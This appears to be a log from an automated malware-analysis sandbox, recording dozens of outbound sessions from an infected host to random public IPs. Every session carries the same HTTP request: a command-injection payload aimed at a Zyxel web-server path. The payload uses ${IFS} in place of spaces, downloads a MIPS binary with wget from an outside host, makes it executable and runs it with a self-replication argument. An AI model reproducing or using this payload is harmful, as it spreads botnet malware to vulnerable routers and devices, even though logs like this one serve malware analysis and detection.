                                                Jan 29, 2024 07:08:05.681041002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8637192.168.2.2333004111.231.30.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681077003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8638192.168.2.2350396171.108.181.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681118965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8639192.168.2.236053263.120.234.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681135893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8640192.168.2.2345688133.225.46.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681202888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8641192.168.2.234754489.172.226.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681241035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8642192.168.2.2347868211.29.176.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681267023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8643192.168.2.235795082.119.127.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681303024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8644192.168.2.2345100121.249.66.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681344986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8645192.168.2.234679279.30.44.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681376934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8646192.168.2.235339296.233.80.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681430101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8647192.168.2.235055227.155.32.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681457043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8648192.168.2.2334382107.52.89.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681495905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8649192.168.2.235472064.121.223.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681529045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8650192.168.2.2358680165.203.58.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681585073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8651192.168.2.233792276.142.198.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681627035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8652192.168.2.23497504.9.172.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681669950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8653192.168.2.234770279.221.178.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681709051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8654192.168.2.2339890122.163.130.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681761980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8655192.168.2.2350210103.135.63.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681782007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8656192.168.2.234044277.19.138.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681844950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8657192.168.2.234686814.78.240.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681866884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8658192.168.2.2349588121.51.199.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681906939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8659192.168.2.234171469.44.231.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.681973934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8660192.168.2.2346158105.57.31.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682012081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8661192.168.2.2359490186.214.240.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682045937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8662192.168.2.235028832.205.26.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682076931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8663192.168.2.2332782219.163.52.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682126045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8664192.168.2.2349486209.235.95.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682168007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8665192.168.2.2347556202.230.136.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682228088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8666192.168.2.235364423.249.197.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682256937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8667192.168.2.2339734181.72.175.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682302952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8668192.168.2.234536677.227.42.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682349920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8669192.168.2.2351226132.194.218.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682388067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8670192.168.2.235875088.176.152.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682429075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8671192.168.2.2336346219.121.167.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682462931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8672192.168.2.235305424.89.152.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682497978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8673192.168.2.2333670216.233.227.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682544947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8674192.168.2.2333754111.60.192.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682569027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8675192.168.2.234759698.233.54.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682595968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8676192.168.2.235553818.69.96.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682648897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8677192.168.2.2349080134.171.63.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682687998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8678192.168.2.2335736210.203.116.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682734966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8679192.168.2.2353984138.165.159.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682759047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8680192.168.2.2355650199.48.121.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682797909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8681192.168.2.234567285.225.213.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682838917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8682192.168.2.233396281.164.235.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682867050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8683192.168.2.233347025.52.226.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682898045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8684192.168.2.235795283.251.78.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682930946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8685192.168.2.235263291.136.80.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.682996988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8686192.168.2.23365008.218.237.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683032990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8687192.168.2.2360884142.233.134.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683082104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8688192.168.2.2346876206.75.127.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683101892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8689192.168.2.2345222199.72.0.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683155060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8690192.168.2.2342192105.14.69.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683171988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8691192.168.2.2348972208.222.11.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683207035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8692192.168.2.2360048167.213.124.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683267117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8693192.168.2.234127252.236.63.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683331013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8694192.168.2.2355292122.212.124.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683357954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8695192.168.2.235399460.126.114.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683410883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8696192.168.2.2347352104.160.46.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683449030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8697192.168.2.2350332149.127.154.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683485985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8698192.168.2.2335344202.224.165.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683531046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8699192.168.2.235418854.218.44.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683566093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8700192.168.2.2354128143.181.33.153443
                                                TimestampBytes transferredDirectionData
